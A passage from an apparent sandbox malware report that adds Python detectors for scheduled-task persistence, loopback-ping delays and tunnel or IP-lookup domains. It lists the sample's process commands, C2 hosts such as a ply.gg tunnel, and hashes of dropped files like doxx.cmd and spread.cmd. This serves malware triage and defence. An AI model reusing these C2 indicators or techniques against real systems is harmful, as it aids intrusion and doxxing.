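C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pjCRu77GHrjM.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\xcopy.exe
xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop
'''

# Threshold is this example's assumption: fewer pings are ordinary connectivity checks.
MIN_DELAY_PINGS = 3

SCHTASKS_CREATE = re.compile(r'(?i)schtasks.*?/create')
TASK_NAME = re.compile(r'(?i)/tn\s+"([^"]+)"')
TASK_SCHED = re.compile(r'(?i)/sc\s+(\S+)')
TASK_ACTION = re.compile(r'(?i)/tr\s+"([^"]+)"')
TASK_LEVEL = re.compile(r'(?i)/rl\s+(\S+)')
# Batch/cmd scripts dropped under the user's Temp directory (assumed pattern).
TEMP_SCRIPT = re.compile(r'(?i)\\AppData\\Local\\Temp\\[^"]+\.(?:bat|cmd)')
# "ping -n N localhost" sleeps roughly N-1 seconds; a common cmd-only delay.
LOOPBACK_PING = re.compile(r'(?i)ping(?:\.exe)?"?\s+(?:-n\s+(\d+)\s+)?(?:localhost|127\.0\.0\.1)\b')


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


def parse_process_list(text):
    """Pair each image path with the command line on the following line."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    return list(zip(lines[0::2], lines[1::2]))


def scan_process_list(text):
    """Return one Finding per suspicious command in the process list."""
    findings = []
    for image, cmdline in parse_process_list(text):
        name = image.lower().rsplit("\\", 1)[-1]
        if name == "schtasks.exe" and SCHTASKS_CREATE.search(cmdline):
            sched = TASK_SCHED.search(cmdline)
            level = TASK_LEVEL.search(cmdline)
            # Logon trigger plus highest run level is the persistence shape seen above.
            if sched and level and sched.group(1).upper() == "ONLOGON" \
                    and level.group(1).upper() == "HIGHEST":
                tn = TASK_NAME.search(cmdline)
                tr = TASK_ACTION.search(cmdline)
                findings.append(Finding(
                    "schtasks_logon_highest", image,
                    f'task "{tn.group(1) if tn else "?"}" runs '
                    f'{tr.group(1) if tr else "?"} at logon with highest privileges'))
        elif name == "cmd.exe":
            m = TEMP_SCRIPT.search(cmdline)
            if m:
                findings.append(Finding("temp_script_via_cmd", image, m.group(0)))
        elif name == "ping.exe":
            m = LOOPBACK_PING.search(cmdline)
            if m and int(m.group(1) or 1) >= MIN_DELAY_PINGS:
                findings.append(Finding(
                    "loopback_ping_delay", image,
                    f"{m.group(1)} echo requests to loopback "
                    f"(~{int(m.group(1)) - 1}s sleep)"))
    return findings


if __name__ == "__main__":
    for f in scan_process_list(SAMPLE_PROCESS_LIST):
        print(f"[{f.rule}] {f.image}: {f.detail}")
```

On a live host the equivalent check is to enumerate scheduled tasks whose trigger is logon, whose run level is highest, and whose action path lies outside C:\Windows; a task named after a Windows feature but launching from C:\Program Files\SubDir is the same signal this parser raises from the report.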
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | https-login--microsoftonline--com.httpsproxy.net | udp |
| GB | 142.250.200.19:80 | https-login--microsoftonline--com.httpsproxy.net | tcp |
| GB | 142.250.200.19:80 | https-login--microsoftonline--com.httpsproxy.net | tcp |
| US | 8.8.8.8:53 | 19.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aadcdn.msauth.net | udp |
| US | 8.8.8.8:53 | aadcdn.msftauth.net | udp |
| US | 13.107.253.65:443 | aadcdn.msauth.net | tcp |
| US | 8.8.8.8:53 | 65.253.107.13.in-addr.arpa | udp |
| US | 13.107.253.65:443 | aadcdn.msauth.net | tcp |
| US | 13.107.253.65:443 | aadcdn.msauth.net | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 13.107.253.65:443 | aadcdn.msauth.net | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | privacy.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mrbeast.codes | udp |
| US | 8.8.8.8:53 | dwrapper-prod.herokuapp.com | udp |
| IE | 46.137.15.86:80 | dwrapper-prod.herokuapp.com | tcp |
| US | 8.8.8.8:53 | 86.15.137.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trustsentry.com | udp |
| US | 8.8.8.8:53 | ya.ru | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tria.ge | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 104.21.79.77:443 | yip.su | tcp |
| US | 8.8.8.8:53 | 77.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.204.67:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 104.18.40.144:443 | tria.ge | tcp |
| GB | 216.58.212.238:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 216.58.212.238:443 | www.youtube.com | udp |
| GB | 142.250.179.246:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.34:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 144.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 142.250.200.34:443 | googleads.g.doubleclick.net | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | tcp |
| GB | 142.250.179.230:443 | static.doubleclick.net | tcp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| GB | 142.250.178.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 172.67.188.178:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | having-jackson.gl.at.ply.gg | udp |
| US | 147.185.221.18:56522 | having-jackson.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 178.188.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 216.58.212.238:443 | www.youtube.com | tcp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 173.194.69.84:443 | accounts.google.com | tcp |
| US | 147.185.221.18:56522 | having-jackson.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 142.250.187.238:443 | consent.youtube.com | tcp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.69.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| GB | 163.70.151.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| GB | 172.217.16.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | video-lhr6-2.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | video-lhr6-1.xx.fbcdn.net | udp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | video-lhr8-1.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | video-lhr8-2.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | udp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 157.240.214.18:443 | video-lhr8-2.xx.fbcdn.net | tcp |
| GB | 157.240.214.18:443 | video-lhr8-2.xx.fbcdn.net | tcp |
| GB | 157.240.214.18:443 | video-lhr8-2.xx.fbcdn.net | tcp |
| GB | 157.240.221.10:443 | video-lhr8-1.xx.fbcdn.net | tcp |
| GB | 157.240.221.10:443 | video-lhr8-1.xx.fbcdn.net | tcp |
| GB | 157.240.221.10:443 | video-lhr8-1.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | scontent-lhr6-2.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | scontent-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | scontent-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | scontent-lhr6-2.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | scontent-lhr6-1.xx.fbcdn.net | udp |
| GB | 163.70.147.23:443 | scontent-lhr6-1.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | 12.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.214.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.221.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | scontent-lhr8-2.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
| GB | 157.240.214.11:443 | scontent-lhr8-2.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | 11.214.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | 9.73.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 147.185.221.18:56522 | having-jackson.gl.at.ply.gg | tcp |
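Most of the table above is sandbox noise: reverse lookups the analysis VM performs on every IP it sees, mDNS, and the Edge session's Google, YouTube and Facebook traffic. The rows that matter are the tunnel and hosting providers the summary tags as "Legitimate hosting services abused for malware hosting/C2" and the IP-lookup services behind "Looks up external IP address via web service". The following is an added example, not part of the Triage report: it parses rows in the table's own markdown layout, drops the noise, and flags domains by provider. The sample rows are copied from the table; the suffix list, the service list and the set of "common" ports are this example's assumptions and should be replaced with your own intel.

```python
from collections import defaultdict

# Constructed sample: a subset of the network table above, in its own layout.
SAMPLE_NETWORK_TABLE = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | dwrapper-prod.herokuapp.com | udp |
| IE | 46.137.15.86:80 | dwrapper-prod.herokuapp.com | tcp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 172.67.188.178:443 | iplogger.com | tcp |
| US | 147.185.221.18:56522 | having-jackson.gl.at.ply.gg | tcp |
| GB | 216.58.212.238:443 | www.youtube.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
"""

# Classification lists are this example's assumptions, seeded from the
# sandbox's summary tags; extend them with your own threat intel.
TUNNEL_SUFFIXES = (".portmap.host", ".ply.gg", ".herokuapp.com")
RECON_SERVICES = {"ip-api.com", "iplogger.com", "pastebin.com"}
COMMON_PORTS = {53, 80, 443, 5353}


def parse_rows(text):
    """Parse '| Country | ip:port | domain | proto |' rows; skip the header."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        country, dest, domain, proto = cells
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain.lower(), "proto": proto.lower()})
    return rows


def triage(text):
    """Group rows by domain and return only domains that match a rule."""
    seen = defaultdict(lambda: {"queried": 0, "contacts": set(), "reasons": set()})
    for r in parse_rows(text):
        d = r["domain"]
        if not d or d.endswith(".in-addr.arpa"):
            continue  # mDNS row without a name, or the VM's own reverse lookups
        entry = seen[d]
        if r["port"] == 53 and r["proto"] == "udp":
            entry["queried"] += 1          # a DNS lookup of the name
        else:
            entry["contacts"].add((r["ip"], r["port"]))  # an actual connection
    flagged = {}
    for d, entry in seen.items():
        if d.endswith(TUNNEL_SUFFIXES):
            entry["reasons"].add("tunnel_provider")
        if d in RECON_SERVICES:
            entry["reasons"].add("recon_service")
        if any(p not in COMMON_PORTS for _, p in entry["contacts"]):
            entry["reasons"].add("nonstandard_port")
        if entry["reasons"]:
            flagged[d] = entry
    return flagged


if __name__ == "__main__":
    for d, e in sorted(triage(SAMPLE_NETWORK_TABLE).items()):
        contacts = ", ".join(f"{ip}:{port}" for ip, port in sorted(e["contacts"])) or "none"
        print(f"{d}: {sorted(e['reasons'])}; queried {e['queried']}x; connected to {contacts}")
```

Run over the full table, the two tunnel hostnames separate cleanly: having-jackson.gl.at.ply.gg is connected to repeatedly on 147.185.221.18:56522, while jozzu420-51305.portmap.host shows up only as repeated DNS queries with no connection listed, which is worth recording as a second, currently unreachable C2 candidate rather than discarding.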
Files
memory/1656-0-0x00000000747DE000-0x00000000747DF000-memory.dmp
memory/1656-1-0x0000000000EA0000-0x0000000000EFE000-memory.dmp
memory/1656-2-0x0000000005730000-0x0000000005754000-memory.dmp
memory/1656-3-0x00000000747D0000-0x0000000074F80000-memory.dmp
memory/1656-4-0x0000000005DD0000-0x0000000006374000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\!main.cmd
| MD5 | 5bef4958caf537ac924b6ce01e1d1e13 |
| SHA1 | cf7a0805a98f3c16ca14c6e420e2ca44ad77a164 |
| SHA256 | e801541a9d48a9adbb720cdb5b06f9bab9b4a62f0434221876a607a7be75d28d |
| SHA512 | 9f62246e56f3461f8d180d3a4bc3ccd6187f457196b770af9c8427a3795504f6b44d2fb7a305d41d54d58e4759136426ca4f6e09771136f27d2c478aad153f99 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.pack
| MD5 | 34a66c4ec94dbdc4f84b4e6768aebf4e |
| SHA1 | d6f58b372433ad5e49a20c85466f9fb3627abff2 |
| SHA256 | fcf530e33a354ac1de143e2f87960e85f694e99d7aa652408c146e8d0a1430fb |
| SHA512 | 4db51769dcee999baf3048c793dde9ad86c76f09fc17edd8e2f1dedf91cf224ddfbe9554c4ff14659ea0f6663b054953ec2ab9d964e6e9ca44ee744e02b7e5b9 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\doxx.cmd
| MD5 | 013a01835332a3433255e3f2dd8d37d6 |
| SHA1 | 8a318cc4966eee5ebcb2c121eb4453161708f96c |
| SHA256 | 23923556f7794769015fb938687bf21c28ae5f562c4550c41d3d568ad608b99b |
| SHA512 | 12e9d439c8c558218d49415bbd27d0749f9f7a7e6c177074e11ac1a6f2185c22c4cf51f5a41133eaddf8a06288c352460d4450ad9702c4652ad259ed1260f42d |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\spread.cmd
| MD5 | 7a71a7e1d8c6edf926a0437e49ae4319 |
| SHA1 | d9b7a4f0ed4c52c9fbe8e3970140b47f4be0b5f1 |
| SHA256 | e0d127c00f9679fb359c04b6238b976f1541918a0df0d6c61f1a44e8f27846ae |
| SHA512 | 96a57412bda3f16e56398cd146ece11e3d42291dceff2aec22871a7e35e3b102b27151984ae0795ca6d5ef5385ef780906d9b13cec78cbbdf019a3de4792ca3a |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.didata
| MD5 | 41b8ce23dd243d14beebc71771885c89 |
| SHA1 | 051c6d0acda9716869fbc453e27230d2b36d9e8f |
| SHA256 | bc86365a38e3c8472413f1656a28b04703d8c77cc50c0187ddf9d0afbb1f9bf7 |
| SHA512 | f0fb505c9f8d2699717641c3571acb83d394b0f8eee9cff80ad95060d1993f9f4d269c58eb35aae64a639054e42aaa699719b08357f7c0c057b407e2bdf775da |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.edata
| MD5 | 37c1a5c63717831863e018c0f51dabb7 |
| SHA1 | 8aab4ebcf9c4a3faf3fc872d96709460d6bf6378 |
| SHA256 | d975b12871fc3f217b71bb314e5e9ea6340b66ece9e26a0c9cbd46de22368941 |
| SHA512 | 4cf2b8efa3c4520cc80c4d560662bddbe4071b6908d29550d59bcda94c8b80a282b5e0b4536a88331a6a507e8410ccb35f4e38d0b571960f822bda7b69e4bb19 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.idata
| MD5 | a73d686f1e8b9bb06ec767721135e397 |
| SHA1 | 42030ea2f06f38d5495913b418e993992e512417 |
| SHA256 | a0936d30641746144eae91e37e8cbed42dc9b3ee3e5fdda8e45ad356180f0461 |
| SHA512 | 58942400f6b909e42d36187fd19d64a56b92c2343ed06f6906291195fea6fe5a79fc628cbfc7c64e09f0196cbaba83dc376985ceef305bd0a2fadaca14b5c9e5 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.txt
| MD5 | 8f2f090acd9622c88a6a852e72f94e96 |
| SHA1 | 735078338d2c5f1b3f162ce296611076a9ddcf02 |
| SHA256 | 61da25d2beb88b55ef629fab530d506a37b56cfabfa95916c6c5091595d936e4 |
| SHA512 | b98fbb6d503267532d85bf0eb466e4e25169baefafdaaa97bdc44eaab2487419fde106626c0cc935ba59bcb4472597e23b3c21e3347ed32de53c185739735404 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\0.txt
| MD5 | c1672053cdc6d8bf43ee7ac76b4c5eee |
| SHA1 | fc1031c30cc72a12c011298db8dc9d03e1d6f75c |
| SHA256 | 1cdb267b3e66becf183e9e747ae904e8684bab519041f39f9bd0b7dd0b3c66cb |
| SHA512 | 12e64a77c5b07d1f0fe1f07a6bf01078373d99bb7372a2d8a5c44fdbf753b44381f112822c1f75475e762d85fcf806487925860941005d342473ec90f9997633 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\CERTIFICATE.cer
| MD5 | c07164d3b38ca643290adaa325e1d842 |
| SHA1 | 895841abf68668214e5c8aa0a1600ff6b88e299d |
| SHA256 | da5dd4622c1c9054dc2c01cb36d26802ffbd3345e8cf8a20a2e8d7a859251600 |
| SHA512 | 92922192fdca0b6a0a6634415fd0ccdd32087584b7b2ea0a1e550b8bf9a5c8fe79401fadc0de8d4d340ef700a01079b51529adcab576f0ca17a864748ae39118 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\data.txt
| MD5 | 4c195d5591f6d61265df08a3733de3a2 |
| SHA1 | 38d782fd98f596f5bf4963b930f946cf7fc96162 |
| SHA256 | 94346a0e38b0c2ccd03cf9429d1c1bce2562c29110bb29a9b0befc6923618146 |
| SHA512 | 10ee2e62ca1efa1cda51ca380a36dfabdd2e72cec41299369cac95fc3864ca5f4faa959f70d2b2c145430e591b1249f233b31bd78ba9ee64cf0604c887b674d7 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\_.txt
| MD5 | ad6e46e3a3acdb533eb6a077f6d065af |
| SHA1 | 595ad8ee618b5410e614c2425157fa1a449ec611 |
| SHA256 | b68ad9b352910f95e5496032eea7e00678c3b2f6b0923eb88a6975ef52daf459 |
| SHA512 | 65d1f189e905419cc0569fd7f238af4f8ba726a4ddad156345892879627d2297b2a29213ac8440756efb1d7aaead1c0858462c4d039b0327af16cbb95840a1e8 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\i.txt
| MD5 | d40fc822339d01f2abcc5493ac101c94 |
| SHA1 | 83d77b6dc9d041cc5db064da4cae1e287a80b9e6 |
| SHA256 | b28af33bc028474586bb62da7d4991ddd6f898df7719edb7b2dfce3d0ea1d8c6 |
| SHA512 | 5701c2a68f989e56e7a38e13910421c8605bc7b58ae9b87c1d15375829e100bad4ac86186f9d5670c9a5e0dd3e46f097d1d276e62d878e0c2f6eb5f6db77dd46 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\2\CODE2000.TTF
| MD5 | 052eaff1c80993c8f7dca4ff94bb83ca |
| SHA1 | 62a148210e0103b860b7c3257a18500dff86cb83 |
| SHA256 | afabc4e845085d6b4f72a9de672d752c002273b52221a10caf90d8cb03334f3c |
| SHA512 | 57209c40b55170da437ab1120b2f486d698084d7d572b14889b2184e8327010a94eee25a86c9e0156ba12ed1a680507016390f059f265cceb3aa8698e8e94764 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\2\readme.txt
| MD5 | d6b389a0317505945493b4bfc71c6d51 |
| SHA1 | a2027bc409269b90f4e33bb243adeb28f7e1e37b |
| SHA256 | d94ed2f7aa948e79e643631e0cd73cf6a221790c05b50ad1d6220965d85ac67c |
| SHA512 | 4ea3c8bdee2b9e093d511a7e4ded557f182df8d96e798cb9ee95014f3b99ebd21f889516e5f934033b01b7ca1e26f5444f2e6be0cc0d7fba0b3faa4cea40e187 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_1598.MP4
| MD5 | 808c2e1e12ddd159f91ed334725890f4 |
| SHA1 | 96522421df4eb56c6d069a29fa4e1202c54eb4e4 |
| SHA256 | 5588c6bf5b74c0a8b088787a536ef729bcedaedfc554ef317beea7fca3b392f7 |
| SHA512 | f6205b07c68f3b6abe7daf0517fbc07def4cb471bd754cd25333f5301dc9f1ac439217c6a09c875376ece4f6fb348e8b9e44e6e8a813ac5d8078cedc5b60bb3c |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_1599.MP4
| MD5 | 06947b925a582d2180ed7be2ba196377 |
| SHA1 | 34f35738fdf5c51fa28093ee06be4c12fcbd9fda |
| SHA256 | b09bd14497d3926dc3717db9a3607c3cec161cc5b73c1af7e63d9ccce982a431 |
| SHA512 | 27f6e3882db9f88834023ff3ece9f39cb041548e772af89d49c97fea7d7ceb4f2efdc019a89c0edf3308929a88fd488749fec97c63b836de136c437300b9ff73 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_1344.MP4
| MD5 | 038725879c68a8ebe2eaa26879c65574 |
| SHA1 | 34062adf5ac391effba12d2cfd9f349b56fd12dc |
| SHA256 | eec8517fe10284368ed5c5b38b7998f573cc6a9d06ae535fe0057523819788be |
| SHA512 | 7b494cd77cb3f2aff8fd6aa68a9ba5cfc87fcaefa36b882e2f930bf82029526257c41a5205364cafc66f4c0f5d154cc1dfe44a6db06952075047975e2156e564 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_1689.MP4
| MD5 | 1e5c2785bd0dd68ba46ddca622960eb5 |
| SHA1 | f99901491d60b748c470dca28f4f7d423eaa42e0 |
| SHA256 | 1e199487c53b09a93d573ff9eee56aadb70de38ffa8d2d89001dca9ab8fdac96 |
| SHA512 | dbb768da8ddc14b5ffbda956258296a4f94cb49775c03cfe5f9e64e402938ec1c045685a14e44294cb31520c4c389d6c742f3f47e2acb46d0d9e96ec1ff4c58e |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_1741.MP4
| MD5 | 5bf2d9277e2aaaf852d4b65d1e9bba67 |
| SHA1 | 5d8876a9c641fc67b1f5fd23da079952fa879cfd |
| SHA256 | 3fbbdfbaa057533ad30787257bd31252fad8bfaaafabcd78473196d9b8fc6820 |
| SHA512 | 848e43d7b0968b0e096e01078db51e029dc8014800a738fee43e39c7bf76ee616347424349a9a5a79af1af46c7f8c01501a6765746326f41a69791de5300523c |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_5049.MP4
| MD5 | 1649d1b2b5b360ee5f22bb9e8b3cd54c |
| SHA1 | ae18b6bf3bfa29b54fee35a321162d425179fc7e |
| SHA256 | d1304d5a157d662764394ca6f89dcad493c747f800c0302bbd752bf61929044e |
| SHA512 | c77b5bad117fda5913866be9df54505698f40ef78bf75dad8a077c33b13955222693e6bc5f4b5b153cfb54ff4d743403b1fd161270fa01ad47e18c2414c3d409 |
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_5068.MP4
| MD5 | 91eb9128663e8d3943a556868456f787 |
| SHA1 | b046c52869c0ddcaec3de0cf04a0349dfa3bd9c3 |
